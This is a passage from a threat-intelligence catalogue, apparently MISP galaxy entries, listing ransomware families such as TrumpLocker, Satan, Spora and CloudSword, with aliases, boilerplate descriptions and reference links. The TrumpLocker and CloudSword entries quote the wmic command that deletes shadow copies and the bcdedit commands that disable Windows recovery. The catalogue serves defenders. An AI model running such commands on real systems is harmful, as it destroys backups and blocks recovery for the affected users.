About: This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments.All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Unlock26 Ransomware"

Table 7965. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/unlock26-ransomware.html

https://www.bleepingcomputer.com/news/security/new-raas-portal-preparing-to-spread-unlock26-ransomware/

PicklesRansomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Python Ransomware

The tag is: misp-galaxy:ransomware="PicklesRansomware"

PicklesRansomware is also known as:

  • Pickles

Table 7966. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/pickles-ransomware.html

https://twitter.com/JakubKroustek/status/834821166116327425

Vanguard Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. This ransomware poses at MSOffice to fool users into opening the infected file. GO Ransomware

The tag is: misp-galaxy:ransomware="Vanguard Ransomware"

Table 7967. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/vanguard-ransomware.html

https://twitter.com/JAMESWT_MHT/status/834783231476166657

PyL33T Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="PyL33T Ransomware"

Table 7968. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/pyl33t-ransomware.html

https://twitter.com/Jan0fficial/status/834706668466405377

TrumpLocker Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. This is the old VenusLocker in disquise .To delete shadow files use the following commend: C:\Windows\system32\wbem\wmic.exe shadowcopy delete&exit https://2.bp.blogspot.com/-8qIiBHnE9yU/WK1mZn3LgwI/AAAAAAAAD-M/ZKl7_Iwr1agYtlVO3HXaUrwitcowp5_NQCLcB/s1600/lock.jpg

The tag is: misp-galaxy:ransomware="TrumpLocker Ransomware"

Table 7969. Table References

Links

https://www.bleepingcomputer.com/news/security/new-trump-locker-ransomware-is-a-fraud-just-venuslocker-in-disguise/

https://id-ransomware.blogspot.co.il/2017/02/trumplocker.html

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-february-24th-2017-trump-locker-macos-rw-and-cryptomix/

Damage Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Written in Delphi

The tag is: misp-galaxy:ransomware="Damage Ransomware"

Table 7970. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/damage-ransomware.html

https://decrypter.emsisoft.com/damage

https://twitter.com/demonslay335/status/835664067843014656

XYZWare Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on HiddenTear

The tag is: misp-galaxy:ransomware="XYZWare Ransomware"

Table 7971. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/xyzware-ransomware.html

https://twitter.com/malwrhunterteam/status/833636006721122304

YouAreFucked Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="YouAreFucked Ransomware"

YouAreFucked Ransomware is also known as:

  • FortuneCrypt

Table 7972. Table References

Links

https://www.enigmasoftware.com/youarefuckedransomware-removal/

CryptConsole 2.0 Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="CryptConsole 2.0 Ransomware"

Table 7973. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/cryptconsole-2-ransomware.html

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/

BarRax Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on HiddenTear

The tag is: misp-galaxy:ransomware="BarRax Ransomware"

BarRax Ransomware is also known as:

  • BarRaxCrypt Ransomware

Table 7974. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/barraxcrypt-ransomware.html

https://twitter.com/demonslay335/status/835668540367777792

CryptoLocker by NTK Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="CryptoLocker by NTK Ransomware"

Table 7975. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/cryptolocker-by-ntk-ransomware.html

UserFilesLocker Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="UserFilesLocker Ransomware"

UserFilesLocker Ransomware is also known as:

  • CzechoSlovak Ransomware

Table 7976. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/userfileslocker-ransomware.html

AvastVirusinfo Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. PAYING RANSOM IS USELESS, YOUR FILES WILL NOT BE FIXED. THE DAMAGE IS PERMENENT!!!!

The tag is: misp-galaxy:ransomware="AvastVirusinfo Ransomware"

Table 7977. Table References

Links

https://id-ransomware.blogspot.co.il/2017_03_01_archive.html

https://id-ransomware.blogspot.co.il/2017/03/avastvirusinfo-ransomware.html

SuchSecurity Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="SuchSecurity Ransomware"

SuchSecurity Ransomware is also known as:

  • Such Security

Table 7978. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/suchsecurity-ransomware.html

PleaseRead Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="PleaseRead Ransomware"

PleaseRead Ransomware is also known as:

  • VHDLocker Ransomware

Table 7979. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/vhd-ransomware.html

Kasiski Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Kasiski Ransomware"

Table 7980. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/kasiski-ransomware.html

https://twitter.com/MarceloRivero/status/832302976744173570

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-february-17th-2017-live-hermes-reversing-and-scada-poc-ransomware/

Fake Locky Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Fake Locky Ransomware"

Fake Locky Ransomware is also known as:

  • Locky Impersonator Ransomware

Table 7981. Table References

Links

https://www.bleepingcomputer.com/news/security/the-locky-ransomware-encrypts-local-files-and-unmapped-network-shares/

https://id-ransomware.blogspot.co.il/2017/02/locky-impersonator.html

https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-thor-extension-after-being-a-bad-malware/

CryptoShield 1.0 Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. CryptoShield 1.0 is a ransomware from the CryptoMix family.

The tag is: misp-galaxy:ransomware="CryptoShield 1.0 Ransomware"

Table 7982. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/cryptoshield-2-ransomware.html

https://www.bleepingcomputer.com/news/security/cryptomix-variant-named-cryptoshield-1-0-ransomware-distributed-by-exploit-kits/

Hermes Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Filemarker: "HERMES"

The tag is: misp-galaxy:ransomware="Hermes Ransomware"

Table 7983. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/hermes-ransomware.html

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-february-17th-2017-live-hermes-reversing-and-scada-poc-ransomware/

https://www.bleepingcomputer.com/forums/t/642019/hermes-ransomware-help-support-decrypt-informationhtml/

https://www.bleepingcomputer.com/news/security/hermes-ransomware-decrypted-in-live-video-by-emsisofts-fabian-wosar/

LoveLock Ransomware or Love2Lock Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="LoveLock Ransomware or Love2Lock Ransomware"

LoveLock Ransomware or Love2Lock Ransomware is also known as:

  • LoveLock

  • Love2Lock

Table 7984. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/lovelock-ransomware.html

Wcry Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Wcry Ransomware"

Table 7985. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/wcry-ransomware.html

DUMB Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="DUMB Ransomware"

Table 7986. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/dumb-ransomware.html

https://twitter.com/bleepincomputer/status/816053140147597312?lang=en

X-Files

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="X-Files"

Table 7987. Table References

Links

https://id-ransomware.blogspot.co.il/2017_02_01_archive.html

https://id-ransomware.blogspot.co.il/2017/02/x-files-ransomware.html

Polski Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The Ransom is 249$ and the hacker demands that the victim gets in contact through e-mail and a Polish messenger called Gadu-Gadu.

The tag is: misp-galaxy:ransomware="Polski Ransomware"

Table 7988. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/polski-ransomware.html

YourRansom Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. This hacker demands that the victim contacts him through email and decrypts the files for FREE.(moreinfo in the link below)

The tag is: misp-galaxy:ransomware="YourRansom Ransomware"

Table 7989. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/yourransom-ransomware.html

https://www.bleepingcomputer.com/news/security/yourransom-is-the-latest-in-a-long-line-of-prank-and-educational-ransomware/

https://twitter.com/_ddoxer/status/827555507741274113

Ranion RaasRansomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ranion Raas gives the opportunity to regular people to buy and distribute ransomware for a very cheap price. (More info in the link below). RaaS service

The tag is: misp-galaxy:ransomware="Ranion RaasRansomware"

Table 7990. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/ranion-raas.html

https://www.bleepingcomputer.com/news/security/ranion-ransomware-as-a-service-available-on-the-dark-web-for-educational-purposes/

Potato Ransomware

Wants a ransom to get the victim’s files back . Originated in English. Spread worldwide.

The tag is: misp-galaxy:ransomware="Potato Ransomware"

Table 7991. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/polato-ransomware.html

of Ransomware: OpenToYou (Formerly known as OpenToDecrypt)

This ransomware is originated in English, therefore could be used worldwide. Ransomware is spread with the help of email spam, fake ads, fake updates, infected install files.

The tag is: misp-galaxy:ransomware="of Ransomware: OpenToYou (Formerly known as OpenToDecrypt)"

Table 7992. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/opentodecrypt-ransomware.html

RansomPlus

Author of this ransomware is sergej. Ransom is 0.25 bitcoins for the return of files. Originated in English. Used worldwide. This ransomware is spread with the help of email spam, fake ads, fake updates, infected install files.

The tag is: misp-galaxy:ransomware="RansomPlus"

Table 7993. Table References

Links

http://www.2-spyware.com/remove-ransomplus-ransomware-virus.html

https://id-ransomware.blogspot.co.il/2017/01/ransomplus-ransomware.html

https://twitter.com/jiriatvirlab/status/825411602535088129

CryptConsole

This ransomware does not actually encrypt your file, but only changes the names of your files, just like Globe Ransomware. This ransomware is spread with the help of email spam, fake ads, fake updates, infected install files

The tag is: misp-galaxy:ransomware="CryptConsole"

Table 7994. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/cryptconsole-ransomware.html

https://www.bleepingcomputer.com/forums/t/638344/cryptconsole-uncrypteoutlookcom-support-topic-how-decrypt-fileshta/

https://twitter.com/PolarToffee/status/824705553201057794

https://twitter.com/demonslay335/status/1004351990493741057

https://twitter.com/demonslay335/status/1004803373747572736

ZXZ Ramsomware

Originated in English, could affect users worldwide, however so far only reports from Saudi Arabia. The malware name founded by a windows server tools is called win32/wagcrypt.A

The tag is: misp-galaxy:ransomware="ZXZ Ramsomware"

Table 7995. Table References

Links

https://www.bleepingcomputer.com/forums/t/638191/zxz-ransomware-support-help-topic-zxz/?hl=%2Bzxz#entry4168310

https://id-ransomware.blogspot.co.il/2017/01/zxz-ransomware.html

VxLock Ransomware

Developed in Visual Studios in 2010. Original name is VxCrypt. This ransomware encrypts your files, including photos, music, MS office, Open Office, PDF… etc

The tag is: misp-galaxy:ransomware="VxLock Ransomware"

Table 7996. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/vxlock-ransomware.html

FunFact Ransomware

Funfact uses an open code for GNU Privacy Guard (GnuPG), then asks to email them to find out the amout of bitcoin to send (to receive a decrypt code). Written in English, can attach all over the world. The ransom is 1.22038 BTC, which is 1100USD.

The tag is: misp-galaxy:ransomware="FunFact Ransomware"

Table 7997. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/funfact.html

http://www.enigmasoftware.com/funfactransomware-removal/

ZekwaCrypt Ransomware

First spotted in May 2016, however made a big comeback in January 2017. It’s directed to English speaking users, therefore is able to infect worldwide. Ransomware is spread with the help of email spam, fake ads, fake updates, infected install files.

The tag is: misp-galaxy:ransomware="ZekwaCrypt Ransomware"

Table 7998. Table References

Links

https://id-ransomware.blogspot.co.il/2016/06/zekwacrypt-ransomware.html

http://www.2-spyware.com/remove-zekwacrypt-ransomware-virus.html

Sage 2.0 Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. This ransomware attacks your MS Office by offering a Micro to help with your program, but instead incrypts all your files if the used id not protected. Predecessor CryLocker

The tag is: misp-galaxy:ransomware="Sage 2.0 Ransomware"

Table 7999. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/sage-2-ransomware.html

https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/

http://www.securityweek.com/sage-20-ransomware-demands-2000-ransom

https://www.bleepingcomputer.com/news/security/sage-2-0-ransomware-gearing-up-for-possible-greater-distribution/

https://www.govcert.admin.ch/blog/27/sage-2.0-comes-with-ip-generation-algorithm-ipga

CloudSword Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. Uses the name “Window Update” to confuse its victims. Then imitates the window update process , while turning off the Window Startup Repair and changes the BootStatusPolicy using these commands: bcdedit.exe /set {default} recoveryenabled No bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

The tag is: misp-galaxy:ransomware="CloudSword Ransomware"

Table 8000. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/cloudsword.html

http://bestsecuritysearch.com/cloudsword-ransomware-virus-removal-steps-protection-updates/

https://twitter.com/BleepinComputer/status/822653335681593345

DN

It’s directed to English speaking users, therefore is able to infect worldwide. Uses the name “Chrome Update” to confuse its victims. Then imitates the chrome update process ,while encrypting the files. DO NOT pay the ransom, since YOUR COMPUTER WILL NOT BE RESTORED FROM THIS MALWARE!!!!

The tag is: misp-galaxy:ransomware="DN"

DN is also known as:

  • Fake

Table 8001. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/dn-donotopen.html

GarryWeber Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. Its original name is FileSpy and FileSpy Application. It is spread using email spam, fake updates, infected attachments and so on. It encryps all your files, including: music, MS Office, etc..

The tag is: misp-galaxy:ransomware="GarryWeber Ransomware"

Table 8002. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/garryweber.html

Satan Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. Its original name is RAAS RANSOMWARE. It is spread using email spam, fake updates, infected attachments and so on. It encryps all your files, including: music, MS Office, Open Office, pictures etc.. This ransomware promotes other to download viruses and spread them as ransomware to infect other users and keep 70% of the ransom. (leaving the other 30% to Satan) https://3.bp.blogspot.com/-7fwX40eYL18/WH-tfpNjDgI/AAAAAAAADPk/KVP_ji8lR0gENCMYhb324mfzIFFpiaOwACLcB/s1600/site-raas.gif RaaS

The tag is: misp-galaxy:ransomware="Satan Ransomware"

Satan Ransomware has relationships with:

  • similar: misp-galaxy:malpedia="Satan" with estimative-language:likelihood-probability="likely"

Table 8003. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/satan-raas.html

https://www.bleepingcomputer.com/forums/t/637811/satan-ransomware-help-support-topic-stn-extension-help-decrypt-fileshtml/

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-january-20th-2017-satan-raas-spora-locky-and-more/

https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/

https://twitter.com/Xylit0l/status/821757718885236740

Havoc

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, infected attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures , videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Havoc"

Havoc is also known as:

  • HavocCrypt Ransomware

Table 8004. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/havoc-ransomware.html

CryptoSweetTooth Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Its fake name is Bitcoin and maker’s name is Santiago. Work of the encrypted requires the user to have .NET Framework 4.5.2. on his computer.

The tag is: misp-galaxy:ransomware="CryptoSweetTooth Ransomware"

Table 8005. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/cryptosweettooth.html

http://sensorstechforum.com/remove-cryptosweettooth-ransomware-restore-locked-files/

Kaandsona Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The word Kaandsona is Estonian, therefore the creator is probably from Estonia. Crashes before it encrypts

The tag is: misp-galaxy:ransomware="Kaandsona Ransomware"

Kaandsona Ransomware is also known as:

  • RansomTroll Ransomware

  • Käändsõna Ransomware

Table 8006. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/kaandsona-ransomtroll.html

https://twitter.com/BleepinComputer/status/819927858437099520

LambdaLocker Ransomware

It’s directed to English and Chinese speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Python Ransomware

The tag is: misp-galaxy:ransomware="LambdaLocker Ransomware"

Table 8007. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/lambdalocker.html

http://cfoc.org/how-to-restore-files-affected-by-the-lambdalocker-ransomware/

NMoreia 2.0 Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="NMoreia 2.0 Ransomware"

NMoreia 2.0 Ransomware is also known as:

  • HakunaMatataRansomware

Table 8008. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/hakunamatata.html

https://id-ransomware.blogspot.co.il/2016_03_01_archive.html

Marlboro Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is .2 bitcoin, however there is no point of even trying to pay, since this damage is irreversible. Once the ransom is paid the hacker does not return decrypt the files. Another name is DeMarlboro and it is written in language C++. Pretend to encrypt using RSA-2048 and AES-128 (really it’s just XOR)

The tag is: misp-galaxy:ransomware="Marlboro Ransomware"

Table 8009. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/marlboro.html

https://decrypter.emsisoft.com/marlboro

https://www.bleepingcomputer.com/news/security/marlboro-ransomware-defeated-in-one-day/

Spora Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Sample of a spam email with a viral attachment: https://4.bp.blogspot.com/-KkJXiHG80S0/WHX4TBpkamI/AAAAAAAADDg/F_bN796ndMYnzfUsgSWMXhRxFf3Ic-HtACLcB/s1600/spam-email.png

The tag is: misp-galaxy:ransomware="Spora Ransomware"

Table 8010. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/spora-ransomware.html

https://blog.gdatasoftware.com/2017/01/29442-spora-worm-and-ransomware

http://blog.emsisoft.com/2017/01/10/from-darknet-with-love-meet-spora-ransomware/

CryptoKill Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The files get encrypted, but the decrypt key is not available. NO POINT OF PAYING THE RANSOM, THE FILES WILL NOT BE RETURNED.

The tag is: misp-galaxy:ransomware="CryptoKill Ransomware"

Table 8011. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/cryptokill-ransomware.html

All_Your_Documents Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="All_Your_Documents Ransomware"

Table 8012. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/allyourdocuments-ransomware.html

SerbRansom 2017 Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The ransom is 500$ in bitcoins. The name of the hacker is R4z0rx0r Serbian Hacker.

The tag is: misp-galaxy:ransomware="SerbRansom 2017 Ransomware"

Table 8013. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/serbransom-2017.html

https://www.bleepingcomputer.com/news/security/ultranationalist-developer-behind-serbransom-ransomware/

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-february-10th-2017-serpent-spora-id-ransomware/

https://twitter.com/malwrhunterteam/status/830116190873849856

Fadesoft Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The ransom is 0.33 bitcoins.

The tag is: misp-galaxy:ransomware="Fadesoft Ransomware"

Table 8014. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/fadesoft-ransomware.html

https://twitter.com/malwrhunterteam/status/829768819031805953

https://twitter.com/malwrhunterteam/status/838700700586684416

HugeMe Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="HugeMe Ransomware"

Table 8015. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/hugeme-ransomware.html

https://www.ozbargain.com.au/node/228888?page=3

https://id-ransomware.blogspot.co.il/2016/04/magic-ransomware.html

DynA-Crypt Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="DynA-Crypt Ransomware"

DynA-Crypt Ransomware is also known as:

  • DynA CryptoLocker Ransomware

Table 8016. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/dyna-crypt-ransomware.html

https://www.bleepingcomputer.com/news/security/dyna-crypt-not-only-encrypts-your-files-but-also-steals-your-info/

Serpent 2017 Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Serpent 2017 Ransomware"

Serpent 2017 Ransomware is also known as:

  • Serpent Danish Ransomware

Table 8017. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/serpent-danish-ransomware.html

Erebus 2017 Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Erebus 2017 Ransomware"

Table 8018. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/erebus-2017-ransomware.html

https://www.bleepingcomputer.com/news/security/erebus-ransomware-utilizes-a-uac-bypass-and-request-a-90-ransom-payment/

Cyber Drill Exercise

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Cyber Drill Exercise "

Cyber Drill Exercise is also known as:

  • Ransomuhahawhere

Table 8019. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/ransomuhahawhere.html

Cancer Ransomware FAKE

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. This is a trollware that does not encrypt your files but makes your computer act crazy (like in the video in the link below). It is meant to be annoying and it is hard to erase from your PC, but possible.

The tag is: misp-galaxy:ransomware="Cancer Ransomware FAKE"

Table 8020. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/cancer-ransomware.html

https://www.bleepingcomputer.com/news/security/watch-your-computer-go-bonkers-with-cancer-trollware/

UpdateHost Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Poses as Microsoft Copyright 2017 and requests ransom in bitcoins.

The tag is: misp-galaxy:ransomware="UpdateHost Ransomware"

Table 8021. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/updatehost-ransomware.html

https://www.bleepingcomputer.com/startups/Windows_Update_Host-16362.html

Nemesis Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 10 bitcoins.

The tag is: misp-galaxy:ransomware="Nemesis Ransomware"

Table 8022. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/nemesis-ransomware.html

Evil Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Domain KZ is used, therefore it is assumed that the decrypter is from Kazakhstan. Coded in Javascript

The tag is: misp-galaxy:ransomware="Evil Ransomware"

Evil Ransomware is also known as:

  • File0Locked KZ Ransomware

Table 8023. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/evil-ransomware.html

http://www.enigmasoftware.com/evilransomware-removal/

http://usproins.com/evil-ransomware-is-lurking/

https://twitter.com/jiriatvirlab/status/818443491713884161

https://twitter.com/PolarToffee/status/826508611878793219

Ocelot Ransomware (FAKE RANSOMWARE)

It’s directed to English speaking users, therefore is able to infect worldwide. This is a fake ransomware. Your files are not really encrypted, however the attacker does ask for a ransom of .03 bitcoins. It is still dangerous even though it is fake, he still go through to your computer.

The tag is: misp-galaxy:ransomware="Ocelot Ransomware (FAKE RANSOMWARE)"

